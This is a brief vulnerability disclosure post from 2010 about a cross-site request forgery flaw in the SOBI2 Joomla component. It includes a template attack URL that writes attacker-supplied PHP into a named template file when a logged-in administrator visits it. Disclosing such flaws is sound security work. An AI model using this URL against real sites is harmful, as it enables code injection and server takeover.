SOBI2 Code Injection CSRF Exploit

Posted in Joomla!
2010-10-04 05:00:00 +0000 UTC

SOBI2's admin panel doesn't explicitly check for _POST requests, nor does it have a nonce.

http://[victim]/administrator/index.php?stpl=default&returnTask=editTemplate&task=saveConfig&option=com_sobi2&editing=config&templateContent=[URL-Encoded PHP]

Successful exploitation of this exploit requires a site administrator to visit a malicious URL while logged in to the backend.

The location of the overwritten file in this case is components/com_sobi2/templates/default/sobi2.details.tmpl.php